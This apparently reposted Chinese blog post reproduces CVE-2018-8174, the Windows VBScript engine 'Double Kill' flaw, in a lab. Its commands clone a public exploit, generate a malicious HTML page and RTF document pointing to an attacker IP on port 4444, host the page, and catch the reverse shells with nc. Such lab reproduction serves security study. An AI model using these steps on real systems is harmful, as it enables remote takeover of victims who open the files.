zoukankan      html  css  js  c++  java
  • 双杀 0day 漏洞(CVE-2018-8174)复现

    漏洞描述:

    CVE-2018-8174 是 Windows VBScript Engine 代码执行漏洞。

    微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该 0day 漏洞进行了修复,将其命名为 CVE-2018-8174

    由于 VBScript 脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码。

    漏洞复现:

    攻击机 IP:192.168.220.160

    靶机 IP:192.168.220.161

    项目地址:https://github.com/Sch01ar/CVE-2018-8174_EXP

    ┌─[root@sch01ar]─[/sch01ar]
    └──╼ #git clone https://github.com/Sch01ar/CVE-2018-8174_EXP
    

    ls 看一下

    生成带有恶意 VBscript 的 html 页面和 word 文档

    ┌─[root@sch01ar]─[/sch01ar/CVE-2018-8174_EXP]
    └──╼ #python CVE-2018-8174.py -u http://192.168.220.160/exploit.html -o msf.rtf -i 192.168.220.160 -p 4444
    

    -u:URL 地址

    -o:生成文档

    -i:监听地址

    -p:监听端口

    查看一下生成的文件

    把 explot.html 复制到 /var/www/html,并开启 apache 服务

    ┌─[root@sch01ar]─[/sch01ar/CVE-2018-8174_EXP]
    └──╼ #cp exploit.html /var/www/html
    ┌─[root@sch01ar]─[/sch01ar/CVE-2018-8174_EXP]
    └──╼ #service apache2 start
    

    用 nc 监听 4444 端口

    用靶机的 IE 浏览器打开恶意 URL

    攻击机收到靶机的 shell 会话

    在靶机用 word 打开 msf.rtf

    攻击机同样也收到会话

  • 相关阅读:
    聊聊MySQL的索引吧
    污力满满的技术解读,瞬间印象深刻
    lua语言(1):安装、基本结构、函数、输入输出
    pandas中的那些让人有点懵逼的异常(坑向)
    与分布式相关的面试题
    图解IP基础知识
    Date类
    String 与StringBuffer习题
    Java的常用类 String
    线程练习题
  • 原文地址:https://www.cnblogs.com/sch01ar/p/9175578.html
Copyright © 2011-2022 走看看